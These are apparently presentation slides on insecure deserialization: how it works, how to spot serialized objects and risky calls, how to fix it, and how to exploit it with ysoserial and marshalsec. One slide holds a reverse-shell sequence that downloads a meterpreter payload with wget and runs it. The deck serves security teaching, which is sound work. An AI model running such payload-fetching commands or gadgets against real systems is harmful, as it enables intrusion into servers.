how to be an app serial killer...don't be scared!!! (or bored )-if you know nothing about this...

How to be an App Serial KillerR E B E C C A D E C K

A V A L A R A

@ R A N G E R _ C H A

DON'T BE SCARED!!! (or bored)

- If you know nothing about this topic…

-Hopefully you understand 25%

- If you know a little about the topic…

-50-75%

- If you are really solid in your knowledge of the topic…

-Learn one or two new things

2

Objective

-Deserialization Background

-Normal Deserialization

-Finding Deserialization Issues

-Deserialization Exploitation

3

Deserialization Background

https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d4

September 29, 2019

Serialization from the beginning…

What is an object?

Collection of values that works as a single unit

5

Serialization from the beginning…

Process of preparing objects for network transport

Also called marshalling

What does serialization look like?

6

Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html

Deserialization

Deserialization is the reverse of serialization

Usually from a readObject call (in Java)

Common in many languages

Force server to load an unexpected object

Often execute arbitrary code

7

Transferring Data with Serialization

8

Server

Serializes

Client

Deserializes

Client

Serializes

Server

Deserializes

Server

Serializes

Writes Data to

Disk/Memcache

Server

Deserializes

Malicious Objects

9

Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/

Deserialization Remediation

How do you fix it?Upgrade for…

Blacklisting???

Nooooo

Hard to write signatures

10https://sayingimages.com/cat-meme/

Deserialization Remediation

Look-ahead DeserializationOverload resolveClass

Ensure that the object is of thecorrect class

JUST DON'T DO IT

Do something better like default JSON parsers

11http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/

Finding Deserialization

September 28, 2019 12

White Box

Talk to developers

Look for deserialization calls

Java – readObject

Python – Pickle

.NET – TypeNameHandling, JavaScriptTypeResolver

Jackson – enableDefaultTyping, setSerializationInclusion, readValue

13

Black Box

Look for objects

Java – rO0, ACED0005, application/x-java-serialized-object

.NET – AAEAAAD/////, TypeObject, $type:

Python –

JSON – ["objtype",{"name": "value"}]

14

Exploiting Deserialization

September 28, 2019 15

Pickle Deserialization

https://blog.nelhage.com/2011/03/exploiting-pickle/

Look for deserialization calls

16

Pickle Deserialization Exploit Class

Create a class that executes code when created

17

Pickle Send Exploit

Send exploit to server

How depends on the app

18

Deserialization in Java

Look for raw Java objects

Find a suitable gadget (object to run code when loaded)Must be an object the app understands

Ysoserial provides several gadgetshttps://github.com/frohoff/ysoserial

19

Deserialization in Java

Vulnerable app https://github.com/hvqzao/java-deserialize-webapp

Includes Apache Commons Collection

Ysoserial exploit only runs one command

Reverse shell in three commandswget IP/meterpreterchmod +x meterpreter./meterpreter

20

Deserialization in Java Example

21

Deserialization in Java Example

22

Deserialization in Java Example

23

Deserialization in Java Example

24

No Java Objects?

Safe without Java objects?

Moar gadgetshttps://github.com/mbechler/marshalsec

Same idea, different formatJSON, XML

25

Jackson Deserialization

26

Jackson Deserialization

27

Jackson Deserialization

28

Jackson Deserialization

29

Summary

• Ysoserial and marshalsec for exploit gadgets

• Find by looking for common serialized object magic numbers or deserialization routines in code

• Often “Fix” Deserialization by blacklisting classes (need patch)

• Better off rewriting the data serialization method

• Use safer (less full-featured) libraries

30

References

Look-ahead Java Deserialization

https://www.ibm.com/developerworks/java/library/se-lookahead/index.html

31

References

Deserialization Resources

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md

Marshalling Pickles

http://frohoff.github.io/appseccali-marshalling-pickles/

ysoserial

https://github.com/frohoff/ysoserial

Deserialization – Different marshallers

https://github.com/mbechler/marshalsec

32

References

Pickle Deserialization

https://blog.nelhage.com/2011/03/exploiting-pickle/

Java Deserialization app

https://github.com/hvqzao/java-deserialize-webapp

Jackson Deserialization

https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/

33

Questions?

34

www.directdefense.comwww.directdefense.com